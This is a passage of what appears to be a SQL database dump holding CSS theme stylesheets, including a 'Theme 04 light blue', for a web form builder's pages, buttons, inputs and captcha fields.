0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0%, #CFAE7B 49%, #C19C67 84%, #AA824E 95%); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6CE9D;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/01/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\n	padding: 13px;\r\n	text-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 10px;\r\n	height: 10px;\r\n	background: #DAA157;\r\n	background: -moz-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -webkit-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -o-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: -ms-linear-gradient(bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	background: linear-gradient(to bottom, #F8DCB2 0%, #E7C187 49%, #E6BE86 84%, #DAA157 95%);\r\n	box-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\n	border-radius: 7px;\r\n	top: 1px;\r\n	left: 1px;\r\n	border: 1px solid #C0A77E;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #E2B983;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #AA824E;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #AA824E;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #E2B983;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #AA824E;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(14,'Theme 04 light blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #678B94 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #88A1A6;\r\nbackground: #86A0A7 ;\r\nbackground: -moz-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -webkit-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -o-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: -ms-linear-gradient(bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbackground: linear-gradient(to bottom, #A0C5CF 0%, #95B3BB 49%, #869AA0 84%, #86A0A7 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #CEE4E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: 